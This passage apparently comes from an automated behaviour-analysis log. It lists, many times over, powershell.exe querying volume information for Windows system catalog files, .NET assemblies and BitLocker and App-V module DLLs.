    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
